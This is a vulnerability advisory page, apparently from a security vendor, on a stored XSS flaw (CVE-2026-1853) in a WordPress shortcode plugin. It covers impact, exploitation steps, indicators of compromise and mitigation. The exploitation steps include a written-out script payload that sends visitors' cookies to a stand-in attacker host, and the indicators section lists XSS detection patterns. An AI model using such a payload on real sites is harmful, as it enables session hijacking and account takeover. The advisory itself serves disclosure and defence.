CVE-2026-1853
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-1853 is a Stored Cross-Site Scripting (XSS) vulnerability in the BuddyHolis ListSearch plugin for WordPress. It affects all versions up to and including 1.1, stemming from insufficient input sanitization and output escaping on user-supplied attributes in the plugin's listsearch shortcode. Authenticated attackers with contributor-level access or above can inject arbitrary web scripts into pages that execute when any user visits the affected page. It carries a CVSS v3.1 base score of 6.4 (Medium) (Red Hat CVE, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability exists because the plugin's listsearch shortcode fails to properly sanitize user-supplied attributes before rendering them in HTML output, allowing malicious script content to be stored in the database and later served to site visitors. Exploitation requires an authenticated session with at minimum contributor-level WordPress privileges, after which an attacker can embed a crafted shortcode containing a malicious JavaScript payload in a post or page (Red Hat CVE, Wordfence).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who visit the injected page, including administrators. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts), defacement, or redirection to malicious sites. The CVSS scope is rated as Changed, reflecting that the impact extends beyond the vulnerable component to affect other users' browser sessions (Red Hat CVE).

Exploitability

No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.03%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for contributor-level authentication, limiting the attack surface compared to unauthenticated vulnerabilities (Red Hat CVE, Wordfence).

Exploitation steps

  1. Obtain Contributor Access: Register or compromise a WordPress account with at least contributor-level privileges on the target site running BuddyHolis ListSearch plugin version 1.1 or earlier.
  2. Craft Malicious Shortcode: Create a new post or page and insert the listsearch shortcode with a malicious JavaScript payload embedded in a vulnerable attribute, e.g., [listsearch attribute="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  3. Publish or Submit Content: Submit the post for review or publish it directly (depending on role permissions). The malicious payload is stored in the WordPress database.
  4. Trigger Execution: When any site visitor (including administrators) navigates to the page containing the injected shortcode, the unsanitized attribute is rendered in the HTML response and the JavaScript executes in their browser.
  5. Harvest Results: Collect stolen session cookies, credentials, or perform further actions (e.g., admin account creation) via the attacker-controlled endpoint (Red Hat CVE, Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or the REST API containing listsearch shortcode content with encoded script tags or JavaScript event handlers.
  • Database: WordPress wp_posts table entries containing [listsearch shortcode with suspicious attribute values including <script>, javascript:, onerror=, onload=, or similar XSS payloads.
  • Network: Outbound requests from victim browsers to unexpected external domains shortly after visiting pages containing the listsearch shortcode, potentially carrying cookie or credential data in query parameters.
  • File System: Unexpected new WordPress admin accounts or plugin/theme file modifications that may indicate post-exploitation activity following session hijacking.

Mitigation and workarounds

WordPress site administrators should update the BuddyHolis ListSearch plugin to a version beyond 1.1 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. As a workaround, restrict contributor-level user registrations and limit who can publish or submit content containing shortcodes. Web application firewalls (WAFs) with XSS filtering rules can provide an additional layer of defense. Monitor the WordPress plugin repository for an updated release addressing this vulnerability (Red Hat CVE, Wordfence).

Community reactions

Wordfence included this vulnerability in their weekly WordPress vulnerability report for the period of February 9–15, 2026, as part of routine plugin security tracking (Wordfence). Spanish national cybersecurity agencies INCIBE-CERT and CCN-CERT also published early alerts for this CVE (INCIBE-CERT). No significant broader media coverage or notable researcher commentary beyond standard vulnerability disclosure channels has been observed.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18603NONEN/A
  • cancel-order-request-woocommerce
NoYesAug 09, 2026
CVE-2026-18473NONEN/A
  • wpdirectorykit
NoYesAug 09, 2026
CVE-2026-18465NONEN/A
  • wp-google-map-gold
NoYesAug 09, 2026
CVE-2026-18464NONEN/A
  • wp-google-map-gold
NoYesAug 09, 2026
CVE-2026-18357NONEN/A
  • wpc-order-tip
NoYesAug 09, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management